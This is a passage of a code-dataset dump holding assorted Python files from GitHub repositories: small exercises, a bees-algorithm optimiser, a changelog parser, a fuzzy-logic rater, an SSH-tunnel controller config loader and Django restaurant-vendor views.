\n","repo_name":"ImageCatInc/sidd","sub_path":"ui/wdg_result.py","file_name":"wdg_result.py","file_ext":"py","file_size_in_byte":28964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11028258045","text":"from brownie import accounts\nfrom brownie.project import get_loaded_projects\n\nfrom bot.conf import settings\n\n\ndef main():\n project = get_loaded_projects()[0]\n acct = accounts.add(settings.DEPLOYER_PRIVATE_KEY)\n project.LiquidateVault.deploy(\n settings.WETH_ADDRESS,\n settings.TCAP_ADDRESS,\n settings.SOLO_MARGIN_ADDRESS,\n settings.SUSHISWAP_ROUTER_ADDRESS,\n {\"from\": acct}\n )\n","repo_name":"cryptexfinance/liquidation-bot","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"1566427659","text":"from random import getrandbits, randint\n\nsick_days = randint(0, 10)\n\nprint(sick_days)\ncalling_in_sick = False\n\nwhile not calling_in_sick and sick_days > 0:\n actually_sick = bool(getrandbits(1))\n kinda_sick = bool(getrandbits(1))\n dont_feel_like_it = bool(getrandbits(1))\n if actually_sick and sick_days > 0:\n calling_in_sick = True\n sick_days -= 1\n elif kinda_sick and dont_feel_like_it:\n calling_in_sick = True\n sick_days -= 1\n\n print(f'Are you sick : {calling_in_sick}')\n\nelse:\n print(f'There are {sick_days} days of 
sickness remaining')","repo_name":"abdallawi/TestPython","sub_path":"praktijkTest/Opdracht1.py","file_name":"Opdracht1.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7476842032","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# Given a year, month and day, determine which day of the year it is.\nyear = int(input('year: \\n'))\nmonth = int(input('month: \\n'))\nday = int(input('day: \\n'))\nmonths = (0,31,59,90,120,151,181,212,243,273,304,334)\n\nif 0< month <= 12:\n sum = months[month -1]\nelse:\n print('data error')\nsum += day\n\nleap = 0\nif(year % 400 == 0) or ((year % 4 == 0) and (year % 100 != 0)):\n leap = 1\nif(leap == 1) and ( month > 2):\n sum += 1\n\nprint('This is day {} of the year'.format(sum))","repo_name":"clearJSer/python-study","sub_path":"练习4.py","file_name":"练习4.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74336939573","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 20 20:13:15 2020\n\n@author: mandarupasani\n\nprojecteuler.net\nproblem 19 : Counting Sundays\n\"\"\"\n\nn_months = [31,\n 28,\n 31,\n 30,\n 31,\n 30,\n 31,\n 31,\n 30,\n 31,\n 30,\n 31]\nlp_months = n_months.copy()\nlp_months[1] = 29\ndays = [\"mon\",\n \"tue\",\n \"wed\",\n \"thu\",\n \"fri\",\n \"sat\",\n \"sun\"]\n\ndef leap_chk(year):\n \"\"\"\n A function to check whether a year is leap or not.\n\n Parameters\n ----------\n year : int\n A year from Christ's birth.\n\n Returns\n -------\n bool\n True if leap, false otherwise\n\n Example\n -------\n >>> leap_chk(1996)\n True\n >>> leap_chk(2005)\n False\n \"\"\"\n if (year % 4) == 0:\n if (year % 100) == 0:\n if (year % 400) == 0:\n return True\n else:\n return False\n else:\n return True\n else:\n return False\n\nsunday_count = 0\ninit_day = 'tue'\n\nfor year in range(1901,1906):\n # print(init_day)\n if (leap_chk(year)):\n months = lp_months\n else:\n months = n_months\n\n for i in range(len(months)):\n nxt_day = days[(days.index(init_day) + (months[i] % 7)) % 7]\n # init_day = nxt_day\n if (nxt_day == 'sun'):\n sunday_count += 1\n\n if (leap_chk(year)):\n init_day = days[(days.index(init_day) + 2) % 7]\n else:\n init_day = days[(days.index(init_day) + 1) % 7]\n\n","repo_name":"mandarvu/project_euler","sub_path":"python3/prob19.py","file_name":"prob19.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35086213688","text":"with open(\"timestamps.txt\") as f:\n data = f.read()\n\ndata = data.split('\\n')\ndataUniq = set(data)\n\ndataDic = {}\nfor dat in dataUniq:\n if dat:\n dat = dat.strip().split()\n dataDic[int(dat[0])] = dat[1] + \" \" + dat[2]\n\nsortedDic = dict(sorted(dataDic.items(), key=lambda item: item[0]))\n\nnewStr =''\nfor k,v in sortedDic.items():\n newStr += str(k) + \" \" + v + \"\\n\"\n\n# to see visually which one is missing\nfor i in range(47, 125): \n print(i,sortedDic.get(i, 'YOOOOOOOOOOOOOO'))\n\nwith open(\"tsSorted.txt\", 'w') as f:\n f.write(newStr)","repo_name":"firozzer/DarknetDiariesJokes","sub_path":"archived/sortTimestampts.py","file_name":"sortTimestampts.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15711935312","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass BeesAlgorithm:\n \"\"\" Bees algorithm 
optimization \"\"\"\n def __init__(self, landscape, n, m, e, nep, nsp, ngh):\n \"\"\"\n Initializes the algorithm.\n\n Args:\n landscape (Landscape): Fitness plane where bees interact.\n n (int): Number of scout bees.\n m (int): Number of sites selected (out of n).\n e (int): Number of best sites (out of m).\n nep (int): Number of bees recruited e.\n nsp (int): Number of bees recruited m.\n ngh (int): Initial size patches.\n \"\"\"\n self.landscape = landscape\n self.n = n\n self.m = m\n self.e = e\n self.nep = nep\n self.nsp = nsp\n self.ngh = ngh\n self.best_fitness = None\n self.positions = np.zeros((self.n, 2))\n self.fitness = np.zeros((self.n, ))\n self._initialize_position()\n self._calculate_fitness()\n\n def _initialize_position(self):\n \"\"\" Initializes position of bee randomly in landscape. \"\"\"\n min_x, max_x, min_y, max_y = self.landscape.limits\n self.positions[:, 0] = np.random.uniform(min_x, max_x, size=(self.n, ))\n self.positions[:, 1] = np.random.uniform(min_y, max_y, size=(self.n, ))\n\n def _calculate_fitness(self):\n \"\"\" Computes the fitness for the bees. \"\"\"\n for idx in range(self.n):\n pos = self.positions[idx, :]\n self.fitness[idx] = self.landscape.evaluate_fitness(pos)\n self.best_fitness = max(self.fitness)\n\n def update_positions(self, recruiters, best):\n \"\"\"\n Updates position of bees.\n\n Args:\n recruiters (np.array): Recruiters bees.\n best (np.array): Best bees.\n \"\"\"\n min_x, max_x, min_y, max_y = self.landscape.limits\n assert len(recruiters) > len(best), \"Number of scouts is lesser than number of optimal solutions.\"\n ratio_recruiter = len(recruiters) // len(best)\n for current_num, current_pos in enumerate(best):\n current_recruiters = (recruiters[current_num * ratio_recruiter: (current_num + 1) * ratio_recruiter]\n if (current_num + 1) * ratio_recruiter <= len(best) else recruiters[current_num * ratio_recruiter:])\n for idx in current_recruiters:\n self.positions[idx, :] = self.positions[current_pos, :] + 2 * self.ngh * np.random.random(size=(1, 2)) - self.ngh\n self._calculate_fitness()\n\n def recruit_scouts(self):\n \"\"\" Recruits scout bees accordint to parameters. 
\"\"\"\n best_fitness_all = self.fitness.argsort()\n recruiters_e = best_fitness_all[:self.nep] # Recruiters in best positions\n recruiters_m_e = best_fitness_all[self.nep:self.nsp + self.nep] # Recruiters in m - e positions\n best_e = best_fitness_all[self.nsp + self.nep + self.m - self.e:]\n best_m_e = best_fitness_all[self.nsp + self.nep: self.nsp + self.nep + self.m - self.e]\n self.update_positions(recruiters_e, best_e)\n self.update_positions(recruiters_m_e, best_m_e)\n return (recruiters_e, best_e, recruiters_m_e, best_m_e)\n\n def abandon_locations(self, recruiters_e, best_e, recruiters_m_e, best_m_e):\n \"\"\"\n Relocates bees again in the landscape (except best).\n\n Args:\n recruiters_e (np.array): Recruiters on best bees.\n best_e (np.array): Best bees in landscape.\n recruiters_m_e (np.array): Recruiters on rest of the best bees.\n best_m_e (np.array): Rest of bees bees in the landscape.\n \"\"\"\n min_x, max_x, min_y, max_y = self.landscape.limits\n # Abandon best places leaving a single scout\n patch_e = np.concatenate([recruiters_e, best_e])\n best_fitness_patch_e = self.fitness[patch_e].argsort()[::-1]\n self.positions[patch_e[best_fitness_patch_e][1:], 0] = np.random.uniform(min_x, max_x, size=(len(best_fitness_patch_e[1:]), ))\n self.positions[patch_e[best_fitness_patch_e][1:], 1] = np.random.uniform(min_y, max_y, size=(len(best_fitness_patch_e[1:]), ))\n # Abandon rest also leaving a single scout\n patch_m_e = np.concatenate([recruiters_m_e, best_m_e])\n best_fitness_patch_m_e = self.fitness[patch_m_e].argsort()[::-1]\n self.positions[patch_m_e[best_fitness_patch_m_e][1:], 0] = np.random.uniform(min_x, max_x, size=(len(best_fitness_patch_m_e[1:]), ))\n self.positions[patch_m_e[best_fitness_patch_m_e][1:], 1] = np.random.uniform(min_y, max_y, size=(len(best_fitness_patch_m_e[1:]), ))\n self._calculate_fitness()\n\n def plot(self):\n \"\"\" Plots bees in landscape. 
\"\"\"\n best_fitness_idx = self.fitness.argsort()[::-1][:self.e]\n for idx in range(self.n):\n if idx in best_fitness_idx:\n circle = plt.Circle(self.positions[idx, :], radius=self.ngh, color=\"gold\", alpha=0.5)\n plt.gca().add_patch(circle)\n plt.plot(self.positions[idx, 0], self.positions[idx, 1], \"darkorange\", marker=\"*\")\n else:\n circle = plt.Circle(self.positions[idx, :], radius=self.ngh, color=\"r\", alpha=0.1)\n plt.gca().add_patch(circle)\n plt.plot(self.positions[idx, 0], self.positions[idx, 1], \"r*\")\n plt.title(f\"Best fitness: {self.best_fitness:.2f}\")\n","repo_name":"sgalella/BeesAlgorithm","sub_path":"bees_algorithm/bees_algorithm.py","file_name":"bees_algorithm.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24209742151","text":"# Day 7: Handy Haversacks: https://adventofcode.com/2020/day/7#part2\nimport re\nfrom os import path\n\nTHIS_DIR = path.dirname(path.realpath(__file__))\nfile_path = path.join(THIS_DIR, 'input.txt')\nwith open(file_path) as f:\n bag_list = f.read().splitlines()\n\nbag_dict = {}\n\nfor line in bag_list:\n container_bags, content = line.split(\"contain\")\n content_list = re.findall(r'(\\d)([\\w\\s]+)bag.', content)\n container_color = container_bags.split(\"bags\")[0].strip()\n contained_bags = [(num, bag.strip()) for num, bag in content_list]\n bag_dict[container_color] = contained_bags\n\n# for k,v in bag_dict.items():\n# print(k,v)\n\n# shiny gold [('5', 'light black'), ('3', 'mirrored yellow'), ('5', 'muted plum')]\n\n# 1: Recursion\n# Check this for recursion in for loop: https://stackoverflow.com/questions/4795527/how-recursion-works-inside-a-for-loop#:~:text=Just%20because%20the%20function%20happens,functions%20again%2C%20and%20so%20on.&text=For%20recursion%2C%20it's%20helpful%20to,stack%20structure%20in%20your%20mind.\n# My earlier solution doesn't consider the container bags, it only considers the contained bags\n\ndef find_bags(bags):\n if len(bags) == 0:\n return 1\n\n part_sum = 0\n for num, bag in bags:\n n = int(num)\n val = find_bags(bag_dict[bag]) # By separating into this, I was able to get the answer\n if val != 1:\n part_sum += n + n * val \n else:\n # Initially was part_sum += n *find_bags(bag_dict[bag])\n part_sum += n * val\n # print(bag, n, part_sum)\n\n return part_sum # Return must be some value\n\n# print(bag_dict['shiny gold'])\n\nprint(find_bags(bag_dict['shiny gold']))\n","repo_name":"nuthanc/advent-of-code","sub_path":"2020/7/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16480540947","text":"#-*- coding: utf-8 -*-\n\"\"\"\n\n.. 
moduleauthor:: Martí Congost \n\"\"\"\nfrom cocktail.iteration import first\nfrom cocktail import schema\nfrom woost.extensions.locations.location import Location\n\n\nclass CountryReference(schema.Reference):\n\n def __init__(self, *args, **kwargs):\n kwargs[\"type\"] = Location\n kwargs.setdefault(\"default_order\", \"location_name\")\n\n constraints = kwargs.get(\"relation_constraints\")\n if constraints is None:\n constraints = {}\n kwargs[\"relation_constraints\"] = constraints\n\n constraints[\"location_type\"] = \"country\"\n\n schema.Reference.__init__(self, *args, **kwargs)\n\n def normalization(self, value):\n\n if isinstance(value, str):\n country = first(\n Location.select({\n \"location_type\": \"country\",\n \"code\": value.upper()\n })\n )\n if country is not None:\n value = country\n\n return value\n\n","repo_name":"marticongost/woost.extensions.locations","sub_path":"woost/extensions/locations/countryreference.py","file_name":"countryreference.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71322008694","text":"import re\nfrom collections import namedtuple\nfrom typing import List, Optional\n\nimport commonmark\n\n\nclass Changelog(object):\n def __init__(self, name: str, releases=None) -> None:\n self.name = name\n self.releases = releases or []\n\n\nclass Section(object):\n def __init__(self, name: str) -> None:\n self.name = name\n\n\nclass Release(object):\n def __init__(self, name: str, release_date=None, sections=None) -> None:\n self.name = name\n self.release_date = release_date\n self.sections = sections or []\n\n def find_section(self, name: str) -> Optional[Section]:\n for section in self.sections:\n if section.name.lower() == name.lower():\n return section\n return None\n\n\nHeading = namedtuple(\"Heading\", [\"level\", \"title\"])\n\n\ndef ast_to_headings(node) -> List[Heading]:\n \"\"\"\n Walks AST and returns a list of headings\n \"\"\"\n\n level = None\n walker = node.walker()\n headings = []\n\n event = walker.nxt()\n while event is not None:\n entering = event[\"entering\"]\n node = event[\"node\"]\n\n if node.t == \"heading\":\n if entering:\n level = node.level\n else:\n level = None\n elif level:\n if node.t != \"text\":\n raise Exception(\n \"Unexpected node {}, only text may be within a heading.\".format(\n node.t\n )\n )\n\n headings.append(Heading(level=level, title=node.literal))\n\n event = walker.nxt()\n\n return headings\n\n\ndef ast_to_changelog(node) -> Changelog:\n changelog = None\n headings = ast_to_headings(node)\n\n if len(headings) > 0 and headings[0].level == 1:\n changelog = Changelog(headings[0].title)\n headings = headings[1:]\n else:\n raise Exception(\n \"Changelog does not start with a level 1 heading, including the changelog name.\"\n )\n\n if any(map(lambda h: h.level == 1, headings)):\n raise Exception(\"Changelog has multiple level 1 headings.\")\n\n release = None\n last_heading_level = 1\n\n for heading in headings:\n if heading.level == 2:\n if release:\n changelog.releases.append(release)\n\n match = re.match(r\"(\\S+) \\([\\d\\-]+\\)\", heading.title)\n if match:\n release = Release(match.groups()[0])\n else:\n release = Release(heading.title)\n elif heading.level == 3:\n if not release:\n raise Exception(\n \"Level 3 heading was not found within a release (level 2 heading).\"\n )\n\n release.sections.append(Section(heading.title))\n\n if heading.level > last_heading_level + 1:\n raise Exception(\n \"Changelog 
heading level jumps from level {} to level {}. Must jump one level per heading.\".format(\n last_heading_level, heading.level\n )\n )\n last_heading_level = heading.level\n\n if release:\n changelog.releases.append(release)\n\n return changelog\n\n\ndef parse_changelog(path: str) -> Changelog:\n with open(path, \"r\") as fp:\n parser = commonmark.Parser()\n ast = parser.parse(fp.read())\n return ast_to_changelog(ast)\n\n\ndef extract_last_changelog(path: str) -> Optional[str]:\n with open(path, \"r\") as fp:\n parser = commonmark.Parser()\n content = fp.read()\n\n changelog = ast_to_changelog(parser.parse(content))\n\n if len(changelog.releases) == 0:\n raise Exception(\"No changelog releases\")\n\n if len(changelog.releases) > 1:\n current = changelog.releases[0]\n previous = changelog.releases[1]\n\n with open(path, \"r\") as fp:\n content = fp.read()\n\n pattern = r\"\\#\\# {}(.*\\n)([\\n\\S\\s]*)\\#\\# {}\".format(\n re.escape(current.name), re.escape(previous.name)\n )\n result = re.search(pattern, content, re.MULTILINE)\n return result.group(2).strip()\n elif len(changelog.releases) == 1:\n current = changelog.releases[0]\n\n with open(path, \"r\") as fp:\n content = fp.read()\n\n pattern = r\"\\#\\# {}(.*\\n)([\\n\\S\\s]*)\".format(re.escape(current.name))\n result = re.search(pattern, content, re.MULTILINE)\n return result.group(2).strip()\n\n return None\n","repo_name":"kylef/maintain","sub_path":"maintain/changelog.py","file_name":"changelog.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"73767460854","text":"from simpful import FuzzySystem, FuzzySet, Triangular_MF, Trapezoidal_MF, LinguisticVariable\n\n\ndef func():\n fuzzy_set1 = FuzzySet(function=Triangular_MF(a=0, b=0, c=5), term=\"poor\")\n fuzzy_set2 = FuzzySet(function=Triangular_MF(a=0, b=5, c=10), term=\"average\")\n fuzzy_set3 = FuzzySet(function=Triangular_MF(a=5, b=10, c=10), term=\"good\")\n return [fuzzy_set1, fuzzy_set2, fuzzy_set3]\n\n\ndef fuzzy_logic(writing_score: int, acting_score: int, impact_score: int):\n fs = FuzzySystem(show_banner=False)\n\n # Define fuzzy sets and linguistic variables\n fs.add_linguistic_variable(\"Writing\", LinguisticVariable(func(), universe_of_discourse=[0, 10]))\n fs.add_linguistic_variable(\"Acting\", LinguisticVariable(func(), universe_of_discourse=[0, 10]))\n fs.add_linguistic_variable(\"Impact\", LinguisticVariable(func(), universe_of_discourse=[0, 10]))\n\n # Define output fuzzy sets and linguistic variable\n q_1 = FuzzySet(function=Triangular_MF(a=0, b=0, c=2.5), term=\"poor\")\n q_2 = FuzzySet(function=Triangular_MF(a=0, b=2.5, c=5), term=\"average\")\n q_3 = FuzzySet(function=Triangular_MF(a=2.5, b=5, c=7.5), term=\"good\")\n q_4 = FuzzySet(function=Trapezoidal_MF(a=5, b=7.5, c=10, d=10), term=\"amazing\")\n fs.add_linguistic_variable(\"Quality\", LinguisticVariable([q_1, q_2, q_3, q_4], universe_of_discourse=[0, 10]))\n\n R1 = \"IF (Writing IS poor) THEN (Quality IS poor)\"\n R2 = \"IF (Writing IS average) AND (Acting IS average) THEN (Quality IS average)\"\n R3 = \"IF (Writing IS average) AND (Acting IS good) THEN (Quality IS average)\"\n R4 = \"IF (Writing IS good) AND (Acting IS average) THEN (Quality IS average)\"\n R5 = \"IF (Writing IS good) AND (Acting IS good) THEN (Quality IS good)\"\n R6 = \"IF (Writing IS good) AND (Acting IS good) AND (Impact IS good) THEN (Quality IS amazing)\"\n fs.add_rules([R1, R2, R3, R4, R5, R6])\n\n # Set antecedents values\n 
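# each crisp 0-10 score below is fuzzified against the triangular\n # membership functions defined above when Mamdani_inference runs\n 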
fs.set_variable(\"Writing\", writing_score)\n fs.set_variable(\"Acting\", acting_score)\n fs.set_variable(\"Impact\", impact_score)\n\n # Perform Mamdani inference and print output\n quality_score = fs.Mamdani_inference([\"Quality\"])\n return int(quality_score[\"Quality\"])\n","repo_name":"EvelynVoce/AI-Chatbot","sub_path":"fuzzy.py","file_name":"fuzzy.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4347928183","text":"import matplotlib.pyplot as plt\nfrom sys import argv\n\n\n\ndef plottheThing(sourceFile):\n plt.clf()\n with open(sourceFile+\".txt\") as f:\n data = f.read()\n errors = [float(value) for value in data.split(\"\\n\") if value]\n plt.plot(range(len(errors)), errors, 'ro')\n plt.axis([0, len(errors), 0, 100])\n plt.title(\"Error from \"+sourceFile)\n plt.ylabel(\"percent error\")\n plt.xlabel(\"iteration\")\n plt.savefig(sourceFile + \"plot\" + '.png', dpi=300)\n plt.show\n\n\nif __name__ == \"__main__\":\n if len(argv) > 1:\n for arg in argv[1:]:\n plottheThing(arg)\n\n","repo_name":"joshuamorton/Machine-Learning","sub_path":"P2/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74808824691","text":"from string import ascii_uppercase, digits\n\n\ndef n_to_p(n, p):\n r = ''\n a = digits + ascii_uppercase\n while n > 0:\n d = a[n % p]\n r = d + r\n n //= p\n return r\n\n\nfor n in range(6, 30):\n if n_to_p(29, n)[-1] == '5':\n print(n)\n","repo_name":"hypergraphman/DimaEGE23","sub_path":"task14/25015562/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20829259507","text":"import datetime\nimport configparser\n\nfrom rssht_controller_lib import config as cconfig\n\nfrom . 
import config\n\n\ndef timedelta_repr(td):\n conv_table = [\n (1, 'second'),\n (60, 'minute'),\n (60 * 60, 'hour'),\n (60 * 60 * 24, 'day'),\n (60 * 60 * 24 * 7, 'week'),\n (60 * 60 * 24 * 30, 'month'),\n (60 * 60 * 24 * 365, 'year'),\n (int(datetime.timedelta.max.total_seconds()) + 1, 'inf'),\n ]\n total_seconds = td.total_seconds()\n \n for i in range(1, len(conv_table)):\n seconds = conv_table[i][0]\n prev_seconds, prev_scale = conv_table[i - 1]\n \n if total_seconds < seconds:\n break\n \n magnitude = int(total_seconds / prev_seconds)\n repr_ = f'{magnitude} {prev_scale}'\n \n if magnitude != 1:\n repr_ = f'{repr_}s'\n \n return repr_\n\n\ndef load_config(filename=None):\n filename = config.CONFIG_FILENAME if filename is None else filename\n \n parser = configparser.ConfigParser()\n \n with open(filename) as f:\n parser.read_file(f)\n \n Null = object()\n \n server_address = parser.get('Settings', 'ServerAddress', fallback=Null)\n server_port = parser.get('Settings', 'ServerPort', fallback=Null)\n server_username = parser.get('Settings', 'ServerUsername', fallback=Null)\n key_filename = parser.get('Settings', 'KeyFilename', fallback=Null)\n server_swap_directory = parser.get('Settings', 'ServerSwapDirectory', fallback=Null)\n sleep_interval_secs = parser.get('Settings', 'SleepIntervalSecs', fallback=Null)\n last_seen_alarm_secs = parser.get('Settings', 'LastSeenAlarmSecs', fallback=Null)\n \n if server_port is not Null:\n server_port = int(server_port)\n if sleep_interval_secs is not Null:\n sleep_interval_secs = int(sleep_interval_secs)\n if last_seen_alarm_secs is not Null:\n last_seen_alarm_secs = int(last_seen_alarm_secs)\n \n if server_address is not Null:\n cconfig.RSSHT_SERVER_ADDR = server_address\n if server_port is not Null:\n cconfig.RSSHT_SERVER_PORT = server_port\n if server_username is not Null:\n cconfig.RSSHT_SERVER_USERNAME = server_username\n if key_filename is not Null:\n cconfig.KEY_FILENAME = key_filename\n if server_swap_directory is not Null:\n cconfig.RSSHT_SERVER_SWAP_DIR = server_swap_directory\n if sleep_interval_secs is not Null:\n config.UPDATE_SLEEP_INTERVAL = sleep_interval_secs\n if last_seen_alarm_secs is not Null:\n config.AGENT_LAST_SEEN_ALARM_THRESHOLD = last_seen_alarm_secs\n\n\ndef persist_config(filename=None):\n filename = config.CONFIG_FILENAME if filename is None else filename\n \n parser = configparser.ConfigParser()\n parser['Settings'] = {\n 'ServerAddress': cconfig.RSSHT_SERVER_ADDR,\n 'ServerPort': str(cconfig.RSSHT_SERVER_PORT),\n 'ServerUsername': cconfig.RSSHT_SERVER_USERNAME,\n 'KeyFilename': cconfig.KEY_FILENAME,\n 'ServerSwapDirectory': cconfig.RSSHT_SERVER_SWAP_DIR,\n 'SleepIntervalSecs': str(config.UPDATE_SLEEP_INTERVAL),\n 'LastSeenAlarmSecs': str(config.AGENT_LAST_SEEN_ALARM_THRESHOLD),\n }\n \n with open(filename, 'w') as f:\n parser.write(f)\n","repo_name":"guallo/remote-ssh-tunnel-controller-qt","sub_path":"rssht_controller_qt/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73779282292","text":"from django. 
contrib import messages\nfrom django.http import JsonResponse\nfrom django.db import IntegrityError\nfrom django.shortcuts import get_object_or_404, render, redirect, HttpResponse \nfrom accounts.forms import UserForm, UserProfileForm\nfrom accounts.models import User, UserProfile\nfrom menu.models import Category, FoodItem\nfrom orders.models import Order, OrderedFood\nfrom vendors.forms import vendorForm, OpeningHourForm\nfrom accounts.utils import send_verification_email\nfrom .utils import get_vendor\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom accounts.views import check_role_vendor\nfrom vendors.models import OpeningHour, Vendor\nfrom menu.forms import CategoryForm, FooditemForm\nfrom django.template.defaultfilters import slugify\n\n\n\n\n\ndef registerRestaurant(request):\n # this restricts the user from going to the Vendor Registration Page after logging in \n if request.user.is_authenticated:\n messages.warning(request, \"You are already logged in!\")\n return redirect('vendordashboard')\n\n\n if request.method == 'POST':\n form = UserForm(request.POST)\n v_form = vendorForm(request.POST, request.FILES)\n if form.is_valid() and v_form.is_valid():\n vendor_name = v_form.cleaned_data['vendor_name']\n user = form.save(commit=False)\n user.role = User.VENDOR\n user.save()\n vendor = v_form.save(commit=False)\n vendor.user = user\n vendor.vendor_slug = slugify(vendor_name) + '-' + str(user.id)\n user_profile = UserProfile.objects.get(user=user)\n vendor.user_profile = user_profile\n vendor.save()\n \n mail_subject = 'Please Activate your Account' \n email_template = 'accounts/emails/account_verification_email.html'\n send_verification_email(request, user, mail_subject, email_template) # send_verification_email is a function created in utils.py\n messages.success(request, \"Your Account has been Registered Successfully, Please Wait for Approval\")\n return redirect('registervendor') \n else:\n messages.error(request, 'An Error occurred during registration!')\n \n else:\n form = UserForm()\n v_form = vendorForm()\n context = {\n 'form': form,\n 'v_form': v_form,\n }\n return render(request, 'vendor/registervendor.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef VendorProfile(request):\n \n profile = get_object_or_404 (UserProfile, user=request.user)\n vendor = get_object_or_404 (Vendor, user=request.user)\n \n if request.method == 'POST':\n profile_form = UserProfileForm(request.POST, request.FILES, instance=profile)\n vendor_form = vendorForm(request.POST, request.FILES, instance=vendor)\n if profile_form.is_valid() and vendor_form.is_valid():\n profile_form.save()\n vendor_form.save()\n messages.success(request, 'Restaurant updated')\n return redirect('vendor-profile')\n else:\n messages.error(request, 'An Error occurred during the update!')\n \n else:\n profile_form = UserProfileForm(instance=profile)\n vendor_form = vendorForm(instance=vendor)\n\n context ={\n 'profile_form': profile_form, 'vendor_form': vendor_form, 'profile':profile, 'vendor': vendor,\n }\n return render(request, 'vendor/vendor_profile.html', context)\n\n\n #Activate the User by setting the is_active status to True\ndef activate(request, uidb64, token):\n try:\n uid = urlsafe_base64_decode(uidb64).decode()\n user = User._default_manager.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = 
None\n \n if user is not None and default_token_generator.check_token(user, token):\n user.is_active = True\n user.save()\n messages.success(request, \"Congratulations! Your Account is Activated\")\n return redirect('myaccount')\n else:\n messages.error(request, 'Invalid Activation link')\n return\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef MenuBuilder(request):\n vendor = get_vendor(request)\n #categories = vendor.category_set.all().order_by('created_at')\n categories = Category.objects.filter(vendor=vendor).order_by('created_at')\n context = {'categories': categories}\n return render(request, 'vendor/menu_builder.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef fooditems_by_category(request, pk):\n vendor = get_vendor(request)\n category = get_object_or_404 (Category, id=pk)\n fooditems = FoodItem.objects.filter(Vendor=vendor, category=category)\n \n context = {\n 'fooditems': fooditems,\n 'category': category,\n }\n\n return render (request, 'vendor/fooditems_by_category.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef AddCategory(request):\n vendor = get_vendor(request)\n if request.method == 'POST':\n category_form = CategoryForm(request.POST)\n #if Category.objects.filter(category_name__iexact=category_name).exists():\n if category_form.is_valid():\n category_name = category_form.cleaned_data['category_name']\n category = category_form.save(commit=False)\n category.vendor = get_vendor(request)\n category.save()\n category.slug = slugify(category_name)+'-'+str(category.id)\n category.save()\n messages.success(request, 'Category added successfully')\n return redirect('menu-builder')\n else: \n messages.error(request, 'Data already exists')\n else:\n category_form = CategoryForm()\n\n context = {\n 'category_form': category_form,\n }\n return render(request, 'vendor/add-category.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef EditCategory(request, pk):\n category = Category.objects.get(id=pk)\n if request.method == 'POST':\n category_form = CategoryForm(request.POST, instance=category)\n if category_form.is_valid():\n category_name = category_form.cleaned_data['category_name']\n category = category_form.save(commit=False)\n category.vendor = get_vendor(request)\n category.slug = slugify(category_name)\n category.save()\n messages.success(request, 'Category updated successfully')\n return redirect('menu-builder')\n else: \n messages.error(request, 'Data already exists')\n else:\n category_form = CategoryForm(instance=category)\n\n context = {\n 'category_form': category_form,\n 'category': category,\n }\n return render (request, 'vendor/edit-category.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef DeleteCategory(request, pk):\n category = Category.objects.get(id=pk)\n category.delete()\n messages.success(request, 'Category has been deleted successfully')\n return redirect('menu-builder')\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef Addfooditem(request):\n if request.method == 'POST':\n form = FooditemForm(request.POST, request.FILES)\n if form.is_valid():\n food_title = form.cleaned_data['food_title']\n fooditem = form.save(commit=False)\n fooditem.Vendor = get_vendor(request)\n fooditem.slug = slugify(food_title)\n fooditem.save()\n messages.success(request, 'Food added successfully')\n return 
